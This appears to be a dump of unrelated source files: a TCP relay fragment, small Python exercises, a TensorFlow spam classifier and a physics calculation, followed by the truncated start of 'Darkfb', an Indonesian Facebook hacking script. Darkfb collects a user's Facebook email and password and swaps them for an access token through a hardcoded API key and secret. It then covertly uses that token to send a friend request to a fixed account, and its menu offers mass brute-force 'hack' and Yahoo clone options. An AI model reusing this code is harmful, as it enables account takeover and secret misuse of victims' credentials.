print "Start ReLink Service" while True: client, addr = s.accept() print "Link From:", addr, "Start ReLink" reLinkClient = socket.socket(socket.AF_INET, socket.SOCK_STREAM) reLinkClient.connect(reLinkAddress) t2 = threading.Thread(target = link, args=(reLinkClient, client)) t2.setDaemon(True) t2.start() t3 = threading.Thread(target = link, args=(client, reLinkClient)) t3.setDaemon(True) t3.start()
718e3a5fc92037cb1b160a8aa5414d824609ab9d
c3082eb2adc43b311dd3c9ff16fd3ed9df85f266
/python/examples/functional/filter.py
9c0234468fbdee92b7c2a3dfc2206ea06281c324
[]
no_license
szabgab/slides
78818c7138331b3ba9e221c81da3678a46efe9b3
63bba06678554db737602f2fbcd6510c36037e8a
refs/heads/main
2023-08-31T07:13:51.536711
2023-08-29T13:17:59
2023-08-29T13:17:59
122,212,527
87
69
null
2023-05-19T06:55:11
2018-02-20T14:57:03
Python
UTF-8
Python
false
false
122
py
numbers = [1, 3, 27, 10, 38] big_numbers = filter(lambda n: n > 10, numbers) print(big_numbers) print(list(big_numbers))
30ca95084a650818ad76ed5e625a46506e6e8e39
60e27c8b1755c741dfd069393e8b65766a9647ae
/07_Natural_Language_Processing/C0702_bag_of_words.py
fb7af5b042f0820d93e1aaa9984960d0ba24a209
[ "MIT" ]
permissive
xiejinwen113/tensorflow_cookbook
d0426991be2369d6480728c2af7a4dc93eccf621
57d7ee719385ddd249a67c3a85bd336e884a67e5
refs/heads/master
2022-03-24T08:30:43.089441
2019-12-09T09:55:39
2019-12-09T09:55:39
null
0
0
null
null
null
null
UTF-8
Python
false
false
7,784
py
# -*- encoding: utf-8 -*- """ @Author : zYx.Tom @Contact : [email protected] @site : https://github.com/zhuyuanxiang/tensorflow_cookbook --------------------------- @Software : PyCharm @Project : TensorFlow_Machine_Learning_Cookbook @File : C0702_bag_of_words.py @Version : v0.1 @Time : 2019-11-07 17:11 @License : (C)Copyright 2018-2019, zYx.Tom @Reference : 《TensorFlow机器学习实战指南,Nick McClure》, Sec0702,P144 @Desc : 自然语言处理,使用 TensorFlow 实现“词袋” @理解: 1. 这个模型是个错误的模型,因为数据集本身就是87%的正常短信,那么只要判断为正常短信就有87%的准确率。 而模型的准确率还不到87%,说明正确理解数据集是非常重要的。 2. 跟踪sess.run(x_col_sums,feed_dict = {x_data: t}),也会发现训练的嵌入矩阵的结果就是UNKNOWN单词和'to'单词过多的短信就是垃圾短信, 这个也是因为数据集中数据偏离造成的,根本原因还是模型与数据不匹配。 """ # common imports import os import string import sys import matplotlib.pyplot as plt import numpy as np # pip install numpy<1.17,小于1.17就不会报错 import sklearn import tensorflow as tf import winsound from tensorflow.contrib import learn from tensorflow.python.framework import ops # 设置数据显示的精确度为小数点后3位 np.set_printoptions(precision = 8, suppress = True, threshold = np.inf, linewidth = 200) # 利用随机种子,保证随机数据的稳定性,使得每次随机测试的结果一样 seed = 42 np.random.seed(seed) tf.set_random_seed(seed) # Python ≥3.5 is required assert sys.version_info >= (3, 5) # Scikit-Learn ≥0.20 is required assert sklearn.__version__ >= "0.20" # numpy 1.16.4 is required assert np.__version__ in ["1.16.5", "1.16.4"] # 屏蔽警告:Your CPU supports instructions that this TensorFlow binary was not compiled to use: AVX2 FMA os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' # 初始化默认的计算图 ops.reset_default_graph() # Open graph session sess = tf.Session() # ---------------------------------------------------------------------- print("载入数据。。。") # 下载的文件直接读出,没有下载的文件就下载后读出 data_file_name = "../Data/SMS_SPam/SMSSpamCollection" with open(data_file_name, encoding = 'utf-8') as temp_output_file: text_data = temp_output_file.read() pass pass # Format Data text_data = text_data.encode('ascii', errors = 'ignore') text_data = text_data.decode().split('\n') text_data = [x.split('\t') for x in text_data if len(x) >= 1] texts = [x[1] for x in text_data] target = [x[0] for x in text_data] # 将标签整数化, 'spam' 表示垃圾短信,设置为1, 'ham' 表示正常短信,设置为0 target = [1 if x == 'spam' else 0 for x in target] # 文本标准化 texts = [x.lower() for x in texts] # 文本字母小写 texts = [''.join(c for c in x if c not in string.punctuation) for x in texts] # 移除标点符号 texts = [''.join(c for c in x if c not in '0123456789') for x in texts] # 移除数字 texts = [' '.join(x.split()) for x in texts] # 移除多余的空格 # 统计文本中不同长度的单词的数目,最大单词长度不超过50个字母 text_lengths = [len(x.split()) for x in texts] text_lengths = [x for x in text_lengths if x < 50] plt.hist(text_lengths, bins = 25) plt.title("图7-1:文本数据中的单词长度的直方图") sentence_size = 25 # 每个句子的单词个数最多不超过25个,不足25个用0填充,超过25个的从后往前截断 min_word_freq = 3 # 单词出现的频率不低于3次,如果某个单词只在某几条短信中出现,那么就不选入字典 # TensorFlow 自带的分词器 VocabularyProcessor() vocab_processor = learn.preprocessing.VocabularyProcessor(sentence_size, min_frequency = min_word_freq) # Have to fit transform to get length of unique words. vocab_processor.fit_transform(texts) # 使用文本数据进行训练并且变换为字典 embedding_size = len(vocab_processor.vocabulary_) # 取字典大小为嵌入层的大小 # 将文本数据切分为训练数据集(80%)和测试数据集(20%) train_indices = np.random.choice(len(texts), int(round(len(texts) * 0.8)), replace = False) test_indices = np.array(list(set(range(len(texts))) - set(train_indices))) texts_train = [x for ix, x in enumerate(texts) if ix in train_indices] texts_test = [x for ix, x in enumerate(texts) if ix in test_indices] target_train = [x for ix, x in enumerate(target) if ix in train_indices] target_test = [x for ix, x in enumerate(target) if ix in test_indices] # 设置单位矩阵用于 One-Hot 编码 identity_mat = tf.diag(tf.ones(shape = [embedding_size])) # 为 logistic regression 创建变量 A = tf.Variable(tf.random_normal(shape = [embedding_size, 1])) b = tf.Variable(tf.random_normal(shape = [1, 1])) # 初始化占位符 x_data = tf.placeholder(shape = [sentence_size], dtype = tf.int32) y_target = tf.placeholder(shape = [1, 1], dtype = tf.float32) # 搜索 Text-Vocab Embedding 权重,单位矩阵用于映射句子中的单词的 One-Hot 向量 x_embed = tf.nn.embedding_lookup(identity_mat, x_data) x_col_sums = tf.reduce_sum(x_embed, 0) # ToDo:为什么要按列求和? # 模型的输出 x_col_sums_2D = tf.expand_dims(x_col_sums, 0) model_output = x_col_sums_2D @ A + b # 交叉熵损失函数 loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels = y_target, logits = model_output)) # Prediction operation prediction = tf.sigmoid(model_output) # Declare optimizer my_opt = tf.train.GradientDescentOptimizer(0.001) train_step = my_opt.minimize(loss) # Intitialize Variables init = tf.global_variables_initializer() sess.run(init) # Start Logistic Regression print('基于训练集中{}个句子开始训练。。。'.format(len(texts_train))) loss_vec, train_acc_all, train_acc_avg = [], [], [] for ix, t in enumerate(vocab_processor.transform(texts_train)): # 只转换不训练,不应该再次训练 y_data = [[target_train[ix]]] sess.run(train_step, feed_dict = {x_data: t, y_target: y_data}) temp_loss = sess.run(loss, feed_dict = {x_data: t, y_target: y_data}) loss_vec.append(temp_loss) if ix % 100 == 0: print('训练集迭代次数: #' + str(ix + 1) + ': Loss = ' + str(temp_loss)) pass [[temp_pred]] = sess.run(prediction, feed_dict = {x_data: t, y_target: y_data}) # 获得预测结果 train_acc_temp = target_train[ix] == np.round(temp_pred) train_acc_all.append(train_acc_temp) if len(train_acc_all) >= 50: # 跟踪最后50个训练精度的平均值 train_acc_avg.append(np.mean(train_acc_all[-50:])) pass pass # 获取测试集的评估精度 print('基于测试集中{}个句子开始评估。。。'.format(len(texts_test))) test_acc_all = [] for ix, t in enumerate(vocab_processor.transform(texts_test)): y_data = [[target_test[ix]]] if ix % 50 == 0: print("测试集迭代次数 #", ix + 1) pass [[temp_pred]] = sess.run(prediction, feed_dict = {x_data: t, y_target: y_data}) test_acc_temp = target_test[ix] == np.round(temp_pred) test_acc_all.append(test_acc_temp) pass print("\n测试集精度: {}".format(np.mean(test_acc_all))) # Plot training accuracy over time plt.figure() plt.plot(range(len(train_acc_avg)), train_acc_avg, 'b-', label = "训练集精度") plt.title("统计最后50个训练集数据的平均训练集精度") plt.xlabel('迭代次数') plt.ylabel("训练集精度") # ----------------------------------------------------------------- # 运行结束的提醒 winsound.Beep(600, 500) if len(plt.get_fignums()) != 0: plt.show() pass
7168dd9db8e3031656351de42448d8638bdc049a
765ac605a9db834f311cc7cf60553b66d42184fb
/lecture_03/task_03/task_03.py
a76e4aebf838ec9ba1105492e9113080fe129eee
[]
no_license
vasil-dimov/python_softuni_homeworks
3946ab13a0b69661f745e1290fa5bd45bdc7c264
1efac3679a3c6459c5cb3f597116fcdab8ca2716
refs/heads/master
2021-06-13T04:25:15.120352
2017-03-27T19:01:15
2017-03-27T19:01:15
null
0
0
null
null
null
null
UTF-8
Python
false
false
644
py
FILE_PATH = './../assets/catalog_sample.csv' # or catalog_full.csv UPDATED_FILE_PATH = './../assets/updated_price_catalog_sample.csv' PERCENT = 0.75 # 75% with open(FILE_PATH, encoding='utf-8') as f: with open(UPDATED_FILE_PATH, 'w', encoding='utf-8') as f_updated: for line in f: line = line.strip() current_line_list = line.split(',') updated_price = float(current_line_list[-1]) + float(current_line_list[-1]) * PERCENT current_line_list[-1] = updated_price updated_line = ','.join(str(e) for e in current_line_list) f_updated.write(updated_line + '\n')
2a1a2dba821ba88d97ccfa8b1ac0ad83ecc9db61
5a07828016e8bafbea5dac8f83c8bfd5d0bfd603
/py_290w290/140309_srw.py
ba5c140fc766ac183dd4cc526b37aee626cb33e2
[]
no_license
JJHopkins/rajter_compare
db5b88d2c6c1efc0fead9b6ed40fb3cce36bedb4
2ba52f4f16cf2aca350a82ea58d0aa8f8866c47c
refs/heads/master
2020-06-04T23:53:57.089329
2014-04-08T18:02:30
2014-04-08T18:02:30
null
0
0
null
null
null
null
UTF-8
Python
false
false
10,176
py
#$ {\bf Free energy between two skewed cylinders (CG-10 in water). Full retarded result, function of separation $\ell$ and angle $\theta$} \\ #$ Equation 12: $G(\ell,\theta) = - \frac{ (\pi R_1^{2})(\pi R_2^{2}) }{2 \pi~\ell^{4} \sin{\theta}} \left( {\cal A}^{(0)}(\ell) + {\cal A}^{(2)}(\ell) \cos 2\theta \right)$ \\ #$ $G(\ell,\theta) = - \frac{k_BT}{64 \pi} \frac{ \pi^2 R_1^{2} R_2^{2} }{\ell^{4} \sin{\theta}} {\sum_{n=0}^{\infty}}' \Delta_{1,\parallel} \Delta_{2,\parallel} ~p_n^{4} ~\int_0^{\infty} t dt ~\frac{e^{- 2 p_n \sqrt{t^{2} + 1}}}{(t^{2} + 1)} \tilde g(t, a_1(i \omega_n), a_2(i \omega_n), \theta),$ \\ #$ with $\tilde g(t, a_1, a_2, \theta) &=& 2 \left[ (1+3a_1)(1+3a_2) t^{4} + 2 (1+2a_1+2a_2+3a_1a_2) t^{2} + 2(1+a_1)(1+a_2)\right] + \nonumber \\ #$ & & ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + (1-a_1)(1-a_2)(t^{2} + 2)^2 \cos 2\theta.$ \\ #!/usr/bin/python import numpy as np import scipy.optimize as opt from scipy.integrate import trapz import matplotlib.pyplot as pl from matplotlib import axis as ax # use pyreport -l file.py from pylab import show from matplotlib.ticker import MultipleLocator from mpl_toolkits.mplot3d import Axes3D from pylab import pause from matplotlib.backends.backend_pdf import PdfPages #pp = PdfPages('plots/skew_ret_water/skew_ret_water.pdf') eiz_x = np.loadtxt('data/eiz_x_output_eV.txt') #perpendicular, radial eiz_z = np.loadtxt('data/eiz_z_output_eV.txt') # parallel,axial eiz_w = np.loadtxt('data/eiz_w_output_eV.txt') # water as intervening medium #eiz_w[0] = eiz_w[1] #NOTE: there is a jump from first val down to second val x90_A0, y90_A0 = np.loadtxt('data/290-W-290-PERPA0.PRN',unpack=True, usecols = [0,1]) # water as intervening medium x90_A2, y90_A2 = np.loadtxt('data/290-W-290-PERPA2.PRN',unpack=True, usecols = [0,1]) # water as intervening medium r_1 = 1.0e-9 r_2 = 1.0e-9 c = 2.99e8 # in m/s Temp = 297 kb = 1.3807e-23 # in J/K coeff = 2.411e14 # in rad/s # NOTES: # at RT, 1 kT = 4.11e-21 J # 1 eV = 1.602e-19 J = 0.016 zJ # h_bar_eV = 6.5821e-16 eVs # h_bar = 1. #1.0546e-34 #in Js #kb = 8.6173e-5 # in eV/K # z_n_eV = (2*pi*kT/h_bar)n # = (0.159 eV) / (6.5821e-16 eVs) # = n*2.411e14 rad/s # z_n_J = (2*pi*kT/h_bar)n # = (1.3807e-23 J/K) / (1.0546e-34 Js))*n # = n*2.411e14 rad/s #coeff = 0.159 # in eV w/o 1/h_bar ns = np.arange(0.,500.) z = ns * coeff ls = np.linspace(1.0e-9, 1.0e-6, 200) #thetas = np.linspace((0.01)*np.pi,(1./2)*np.pi,25) thetas = [np.pi/8,np.pi/4,np.pi/3,np.pi/2] dt = 1.0 ts = np.arange(1.0,10000.,dt) def Aiz(perp, par,med): return (2.0*(perp-med)*med)/((perp+med)*(par-med)) def ys(a,time,eizw,L, N): term0 = ( time / (time*time+1.0) ) term1 = ( time**4 * 2.0*(1. + 3.*a)*(1.+3.*a) ) term2 = ( time**2 * 4.0*(1. + 2.0*a+2.0*a+3.0*a*a)) term3 = ( 4.0*(1. + a)*(1.0 + a) ) term4 = (-2.0 * np.sqrt(eizw)* L * coeff * N / c * np.sqrt(time*time + 1.0)) #print 'ys term0', term0 #print 'ys term1', term1 #print 'ys term2', term2 #print 'ys term3', term3 #print 'ys term4', term4 #print '----' return (term0) * np.exp(term4)*( (term1) + (term2) + (term3))#* term5 def y_2s(a,time,eizw, L, N): term0 = (time / (time*time+1.0) ) term1 = ((1.- a)*(1.- a)*(time * time + 2.0)*(time * time + 2.0)) term2 = (-2.0 * np.sqrt(eizw)* L * coeff * N / c * np.sqrt(time*time + 1.0)) #print 'y_2s term0', term0 #print 'y_2s term1', term1 #print 'y_2s term2', term2 #print '----' return term0 * term1* np.exp(term2) #* term3 def As(eizz,eizw,L,N,Y): term1 = (((eizz-eizw)/eizw)*((eizz-eizw)/eizw)) term2 = (Y * eizw *eizw * (coeff*N)**4 * L**4 / (c**4)) #term3 = Y #print 'As term1 = ', term1 #print 'As term2 = ', term2 ##print 'As term3 = ', term3 #print '----' return term1 * term2# * term3 def A_2s(eizz,eizw, L , N ,Y): term1 = (((eizz-eizw)/eizw)*((eizz-eizw)/eizw)) term2 = (Y * eizw *eizw * (coeff*N)**4 * L**4 / (c**4)) #term3 = Y #print 'A_2s term1 = ', term1 #print 'A_2s term2 = ', term2 ##print 'A_2s term3 = ', term3 #print '----' return (term1 * term2)# * term3 y = np.zeros(shape=(len(ns),len(ls))) y_2 = np.zeros(shape=(len(ns),len(ls))) A = np.zeros(shape=(len(ns),len(ls))) A_2 = np.zeros(shape=(len(ns),len(ls))) EL = np.zeros(len(ls)) G_l_t_dt = np.zeros(shape=(len(ls),len(thetas))) A2_theta = np.zeros(shape=(len(ls),len(thetas))) aiz = [] aiz = Aiz(eiz_x,eiz_z, eiz_w) # of length = len(ns) #aiz[74] = aiz[73] #aiz[75] = aiz[76] for k,length in enumerate(ls): sum_A = np.empty(len(ls)) sum_A_2 = np.empty(len(ls)) for j,n in enumerate(ns): # Integral: y[j,k] = trapz(ys(aiz[j],ts,eiz_w[j],length,n),ts,dt) y_2[j,k] = trapz(y_2s(aiz[j],ts,eiz_w[j],length,n),ts,dt) #print 'dt Integral y = ',i,k,j, y #print 'dt Integral y_2 = ',i,k,j, y_2 #print '----' #print 'N terms for A0 = ' , As(eiz_z[j],eiz_w[j],length,n,y) #print 'N terms for A2 = ', A_2s(eiz_z[j],eiz_w[j],length,n,y_2) #print '----' A[j,k] = As(eiz_z[j],eiz_w[j],length,n,y[j,k]) A_2[j,k] = A_2s(eiz_z[j],eiz_w[j],length,n,y_2[j,k])# * np.cos(2.0*theta) A[0] = (1./2)*A[0] A_2[0] = (1./2)*A_2[0] sum_A = np.sum(A,axis=0) #print 'sum of A0 = ', k,j,sum_A sum_A_2 = np.sum(A_2,axis=0) #print 'sum of A2 = ', k,j,sum_A_2 #print '----' #print 'shape sum_A_2 = ', np.shape(sum_A_2) #sys.exit() for k,length in enumerate(ls): for i, theta in enumerate(thetas): EL[k] = 1./(length*length*length*length) A2_theta[k,i] = sum_A_2[k]* np.cos(2.0*theta) G_l_t_dt[k,i] = (1.602e-19 / 4.11e-21) * (1./32) * EL[k]*np.pi*r_1*r_1*r_2*r_2*(sum_A[k] + sum_A_2[k]* np.cos(2.0*theta) )/(2.0*np.sin(theta))# (1e21)* np.savetxt('G_srw.txt',G_l_t_dt) #pl.figure() #pl.plot(ns,eiz_x, color = 'b', label = r'$\varepsilon_{\hat{x}}(i\zeta_{N})$') #pl.plot(ns,eiz_z, color = 'r', label = r'$\varepsilon_{\hat{z}}(i\zeta_{N})$') ##pl.plot(ns,eiz_w, color = 'c', label = r'$\varepsilon_{vac}(i\zeta_{N})$') #pl.plot(ns,eiz_w, color = 'c', label = r'$\varepsilon_{water}(i\zeta_{N})$') #pl.xlabel(r'$N$', size = 20) #pl.ylabel(r'$\varepsilon(i\zeta)$', size = 20) #pl.legend(loc = 'best') ##pl.title(r'$\mathrm{CG-10\, DNA}$', size = 20) ##pl.axis([0,500,0.9,2.6]) ##pl.savefig('plots/skew_ret_water/eiz.pdf' ) #show() pl.figure() pl.plot(ns,aiz, color = 'b')#, label = r'$\varepsilon_{\hat{x}}(i\zeta_{N})$') pl.xlabel(r'$N$', size = 20) pl.ylabel(r'$a_{1,2}(i\zeta_{N})$', size = 20) pl.legend(loc = 'best') #pl.title(r'$\mathrm{Anisotropy \,Metric}$', size = 20) #pl.axis([0,500,0.9,2.6]) pl.grid() pl.savefig('plots/skew_ret_water/140306_290w290_aiz.pdf' ) show() pl.figure() pl.loglog(1e9*ls,(1e21*kb*Temp/32)*sum_A ,'b-', label = r'$\mathcal{A^{(0)}}(\ell)$') pl.loglog(1e9*ls,(1e21*kb*Temp/32)*sum_A_2,'g-', label = r'$\mathcal{A^{(2)}}(\ell)$') pl.loglog(x90_A0, y90_A0,'k-' , label = r'GH $\mathcal{A^{(0)}}(\ell)$') pl.loglog(x90_A2, y90_A2,'k--', label = r'GH $\mathcal{A^{(2)}}(\ell)$') pl.xlabel(r'$\mathrm{separation}\,\ell\,\,\,\rm{[nm]}$', size = 20) pl.ylabel(r'$\mathrm{\mathcal{A^{(0)},\,\,A^{(2)}}}\,\,\,\rm{[zJ]}$', size = 20) #pl.title(r'$\mathrm{Hamaker \, coeff.s \,:\,skewed,\,retarded,\,water}$', size = 20) #pl.legend(loc = 'best') #pl.axis([1e-9,1e-6,1e-24,1e-19]) pl.minorticks_on() pl.ticklabel_format(axis = 'both') pl.grid(which = 'both') pl.tick_params(which = 'both',labelright = True) pl.savefig('plots/skew_ret_water/140309_290w290_GH_skew_ret_A0_A2.pdf') show() pl.figure() pl.loglog(ls,(kb*Temp/32)*sum_A,'b-', label = r'$\mathcal{A^{(0)}}(\ell)$') pl.loglog(ls,(kb*Temp/32)*sum_A_2,'g-', label = r'$\mathcal{A^{(2)}}(\ell)$') #pl.loglog(ls,(kb*T/32)*A2_theta,':', label = r'$\mathcal{A^{(2)}}(\ell)cos(2\theta)$') pl.xlabel(r'$\mathrm{separation}\,\ell\,\,\,\rm{[m]}$', size = 20) pl.ylabel(r'$\mathrm{\mathcal{A^{(0)},\,\,A^{(2)}}}$', size = 20) #pl.title(r'$\mathrm{Hamaker \, coeff.s \,:\,skewed,\,retarded,\,water}$', size = 20) pl.legend(loc = 'upper right') #pl.axis([1e-9,1e-6,1e-24,1e-19]) pl.minorticks_on() pl.ticklabel_format(axis = 'both') pl.grid(which = 'both') pl.tick_params(which = 'both',labelright = True) pl.savefig('plots/skew_ret_water/140306_290w290_skew_ret_A0_A2.pdf') show() ls4 = 1e9*ls[ 2]#2] ls5 = 1e9*ls[12]#4] ls6 = 1e9*ls[22]#6] ls1 = 1e9*ls[32]#8] ls2 = 1e9*ls[42]#12] ls3 = 1e9*ls[52]#16] fig = pl.figure() ax = fig.add_axes([0.1,0.1,0.8,0.8]) #pl.semilogy(thetas, G_l_t_dt) ax.semilogy(thetas, G_l_t_dt[ 2,:], label = r'$\ell$ = %1.2f nm' %ls4) ax.semilogy(thetas, G_l_t_dt[12,:], label = r'$\ell$ = %1.2f nm' %ls5) #ax.semilogy(thetas, G_l_t_dt[22,:], label = r'$\ell$ = %1.2f nm' %ls6) ax.semilogy(thetas, G_l_t_dt[32,:], label = r'$\ell$ = %1.2f nm' %ls1) #ax.semilogy(thetas, G_l_t_dt[42,:], label = r'$\ell$ = %1.2f nm' %ls2) ax.semilogy(thetas, G_l_t_dt[52,:], label = r'$\ell$ = %1.2f nm' %ls3) #ax.semilogy(0,0,'', label = r'$G_\theta = cos(2\theta)/2sin(\theta)$') pl.xlabel(r'$Angle\,\,\mathrm{[radians]}$', size = 20) pl.ylabel(r'$-G(\ell,\theta)\,\,\mathrm{[k_{B}T]}$', size = 20) #pl.axis([0,1.7,1e-10,1.0]) #pl.title(r'$\mathrm{-G(\ell,\theta)\,vs.\,angle:\,skewed,\,retarded,\,water}$', size = 20) pl.legend(loc = 'lower left') #pl.savefig('plots/skew_ret_water/skew_ret_water_G_vs_theta.pdf') #show() pl.minorticks_on() pl.ticklabel_format(axis = 'both') pl.grid(which = 'both') pl.tick_params(which = 'both',labelright = True) pl.savefig('plots/skew_ret_water/140306_290w290_skew_ret_G_vs_theta_fixed_l.pdf') show() pl.figure() #pl.loglog(ls, G_l_t_dt)#, label = labels[i]) pl.loglog(ls, G_l_t_dt[:,1], label = r'$\theta = \pi/4$') pl.loglog(ls, G_l_t_dt[:,2], label = r'$\theta = \pi/3$') pl.loglog(ls, G_l_t_dt[:,3], label = r'$\theta = \pi/2$') pl.xlabel(r'$\ell\,\,\mathrm{[m]}$', size = 24) pl.ylabel(r'$-G(\ell,\theta)\,\,\mathrm{[k_{B}T]}$', size = 20) #pl.axis([1.0e-9, 1.0e-6,1e-16,1e3]) #pl.title(r'$\mathrm{-G(\ell,\theta)\,vs.\,separation:\,skewed,\,retarded,\,water}$', size = 20) pl.legend(loc = 'best') pl.minorticks_on() pl.ticklabel_format(axis = 'both') pl.grid(which = 'both') pl.tick_params(which = 'both',labelright = True) pl.savefig('plots/skew_ret_water/140306_290w290_skew_ret_G_vs_l.pdf') show()
3a3056a3ecc1b144f2938566879e80bcdd3c95c1
4561d27896157c67da3c97fb7bd99537b3ec1ac2
/Darkfb.sh
1be0b8432c647878d63caa02476ed42b381c143a
[]
no_license
bang-Habib/dark.fb
2fb23d75c544a489b727fd859a137481f700a99a
5c774aff111510193d51ce70a8aef50b09de8dab
refs/heads/main
2023-02-10T14:32:41.114991
2021-01-13T12:38:13
2021-01-13T12:38:13
329,298,237
1
0
null
null
null
null
UTF-8
Python
false
false
33,210
sh
#!/usr/bin/python2 # coding=utf-8 import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize from multiprocessing.pool import ThreadPool from requests.exceptions import ConnectionError from mechanize import Browser reload(sys) sys.setdefaultencoding('utf8') br = mechanize.Browser() br.set_handle_robots(False) br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1) br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')] def keluar(): print "\033[1;96m[!] \x1b[1;91mExit" os.sys.exit() def acak(x): w = 'mhkbpcP' d = '' for i in x: d += '!'+w[random.randint(0,len(w)-1)]+i return cetak(d) def cetak(x): w = 'mhkbpcP' for i in w: j = w.index(i) x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j)) x += '\033[0m' x = x.replace('!0','\033[0m') sys.stdout.write(x+'\n') def jalan(z): for e in z + '\n': sys.stdout.write(e) sys.stdout.flush() time.sleep(0.05) logo = """ \x1b[1;93m______ \x1b[1;92m_______ \x1b[1;94m______ \x1b[1;91m___ _\n \x1b[1;93m| | \x1b[1;92m| _ |\x1b[1;94m| _ | \x1b[1;91m| | | |\n \x1b[1;93m| _ |\x1b[1;92m| |_| |\x1b[1;94m| | || \x1b[1;91m| |_| |\n \x1b[1;93m| | | |\x1b[1;92m| |\x1b[1;94m| |_||_ \x1b[1;91m| _|\n \x1b[1;93m| |_| |\x1b[1;92m| |\x1b[1;94m| __ |\x1b[1;91m| |_ \n \x1b[1;93m| |\x1b[1;92m| _ |\x1b[1;94m| | | |\x1b[1;91m| _ |\n \x1b[1;93m|______| \x1b[1;92m|__| |__|\x1b[1;94m|___| |_|\x1b[1;91m|___| |_| \x1b[1;96mFB\n\n \x1b[1;95m●▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬●\n ✫╬─ \x1b[1;92mAUTHOR \x1b[1;91m: \x1b[1;93mKrisna ft HABIB \x1b[1;95m─╬✫\n ✫╬─ \x1b[1;92mWhatsApp \x1b[1;92m \x1b[1;91m: \x1b[1;96m+62 895-6224-13472 - +62 857-9889-8387 \x1b[1;95m─╬✫\n ✫╬─ \x1b[1;92mTEAM \x1b[1;91m: \x1b[1;94mTEAM SQUOT BADUT \x1b[1;95m─╬✫\n ●▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬● """ def tik(): titik = ['. ','.. ','... '] for o in titik: print("\r\033[1;96m[●] \x1b[1;93mSedang masuk \x1b[1;97m"+o),;sys.stdout.flush();time.sleep(1) back = 0 threads = [] berhasil = [] cekpoint = [] oks = [] id = [] listgrup = [] vulnot = "\033[31mNot Vuln" vuln = "\033[32mVuln" def siapa(): os.system('clear') nama = raw_input("\033[1;97mSiapa nama kamu ? \033[1;91m: \033[1;92m") if nama =="": print"\033[1;96m[!] \033[1;91mIsi yang benar" time.sleep(1) siapa() else: os.system('clear') jalan("\033[1;97mSelamat datang \033[1;92m" +nama+ "\n\033[1;97mTerimakasih telah menggunakan tools ini !!") time.sleep(1) loginSC() def loginSC(): os.system('clear') print"\033[1;97mSilahkan login SC nya dulu bosque\n" username = raw_input("\033[1;96m[*] \033[1;97mUsername \033[1;91m: \033[1;92m") password = raw_input("\033[1;96m[*] \033[1;97mPassword \033[1;91m: \033[1;92m") if username =="Krisna" and password =="Habib": print"\033[1;96m[✓] \033[1;92mLogin success" time.sleep(1) login() else: print"\033[1;96m[!] \033[1;91mSalah!!" time.sleep(1) LoginSC() def login(): os.system('clear') try: toket = open('login.txt','r') menu() except (KeyError,IOError): os.system('clear') print logo print 42*"\033[1;96m=" print('\033[1;96m[☆] \x1b[1;93mLOGIN AKUN FACEBOOK ANDA \x1b[1;96m[☆]' ) id = raw_input('\033[1;96m[+] \x1b[1;93mID/Email \x1b[1;91m: \x1b[1;92m') pwd = raw_input('\033[1;96m[+] \x1b[1;93mPassword \x1b[1;91m: \x1b[1;92m') tik() try: br.open('https://m.facebook.com') except mechanize.URLError: print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi" keluar() br._factory.is_html = True br.select_form(nr=0) br.form['email'] = id br.form['pass'] = pwd br.submit() url = br.geturl() if 'save-device' in url: try: sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32' data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"} x=hashlib.new("md5") x.update(sig) a=x.hexdigest() data.update({'sig':a}) url = "https://api.facebook.com/restserver.php" r=requests.get(url,params=data) z=json.loads(r.text) unikers = open("login.txt", 'w') unikers.write(z['access_token']) unikers.close() print '\n\033[1;96m[✓] \x1b[1;92mLogin Berhasil' requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token']) os.system('xdg-open https://www.youtube.com/omaliptv') menu() except requests.exceptions.ConnectionError: print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi" keluar() if 'checkpoint' in url: print("\n\033[1;96m[!] \x1b[1;91mSepertinya akun anda kena checkpoint") os.system('rm -rf login.txt') time.sleep(1) keluar() else: print("\n\033[1;96m[!] \x1b[1;91mPassword/Email salah") os.system('rm -rf login.txt') time.sleep(1) login() def menu(): os.system('clear') try: toket=open('login.txt','r').read() except IOError: os.system('clear') print"\033[1;96m[!] \x1b[1;91mToken invalid" os.system('rm -rf login.txt') time.sleep(1) keluar() try: otw = requests.get('https://graph.facebook.com/me?access_token='+toket) a = json.loads(otw.text) nama = a['name'] id = a['id'] except KeyError: os.system('clear') print"\033[1;96m[!] \033[1;91mToken invalid" os.system('rm -rf login.txt') time.sleep(1) login() except requests.exceptions.ConnectionError: print"\033[1;96m[!] \x1b[1;91mTidak ada koneksi" keluar() os.system("clear") print logo print 42*"\033[1;96m=" print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m Nama \033[1;91m: \033[1;92m"+nama+"\033[1;97m " print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m ID \033[1;91m: \033[1;92m"+id+"\x1b[1;97m " print 42*"\033[1;96m=" print "\x1b[1;97m1.\x1b[1;93m Hack facebook MBF" print "\x1b[1;97m2.\x1b[1;93m Lihat daftar grup " print "\x1b[1;97m3.\x1b[1;93m Informasi akun " print "\x1b[1;97m4.\x1b[1;93m Yahoo clone " print "\n\x1b[1;91m0.\x1b[1;91m Logout " pilih() def pilih(): unikers = raw_input("\n\033[1;97m >>> \033[1;97m") if unikers =="": print "\033[1;96m[!] \x1b[1;91mIsi yang benar" pilih() elif unikers =="1": super() elif 